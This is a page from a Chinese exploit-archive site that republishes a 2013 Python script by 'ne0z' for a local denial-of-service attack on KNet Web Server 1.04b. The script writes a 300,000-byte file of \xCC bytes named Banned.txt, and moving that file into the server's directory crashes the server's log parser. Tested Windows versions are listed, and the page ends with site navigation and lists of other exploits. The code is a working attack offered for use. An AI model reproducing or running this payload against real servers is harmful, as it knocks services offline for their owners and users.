首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KNet Web Server 1.04b Denial Of Service
来源:vfocus.net 作者:ne0z 发布时间:2013-06-09  
#!/usr/bin/python
# Exploit Title 	: KNet Web Server 1.04b Local Denial Of Service
# Date			: 6 Jun 2013
# Exploit Author	: ne0z
# Vendor Homepage	: http://www.hatsecure.com
# Version		: KNet Web Server 1.04b
# Tested on		: Windows XP Profesional SP3
#			  Windows XP Profesional SP2
#			  Windows 7 Ultimate
#
# Description :
# KNet Web Server have banned log with location C:\\Program Files\KNet\Banned.txt
# The parser of the banned log is vulnerable, when size of content in Banned.txt more than 200 KB
# and then KNet Web Server will crash.
#
# To generate Banned.txt just simple (Windows)
# $ python KNet_DOS_exploit.py C://
#
# Then move the file from C:\\Banned.txt to  C:\\Program Files\KNet\Banned.txt

import sys, os

arg = sys.argv

if (len(arg) < 1):
	print "KNet v1.04b - Local DOS exploit"
	print "Usage : "
	print "$ python "+arg[0]+" [PATH]"
	print "Example : "
	print "$ python "+arg[0]
	sys.exit(0)

try:
	print "[X] Generate payload"
	d = open("Banned.txt","w")
	payload = "\xCC" * 300000
	d.write(payload)
	d.close()
	print "[X] Saved to Banner.txt"
except:
	print "Error"



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ZPanel 10.0.0.2 Remote Command
·Quick TFTP Server 2.2 - Denial
·Sun Java Web Start Double Quot
·Microsoft Internet Explorer te
·Java Web Start Double Quote In
·Java Applet Driver Manager Pri
·Novell Zenworks Mobile Device
·Synactis PDF In-The-Box Connec
·Plesk Apache Zeroday Remote Ex
·Exim and Dovecot Insecure Conf
·MiniUPnPd 1.0 Stack Buffer Ove
·MobileIron Virtual Smartphone
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved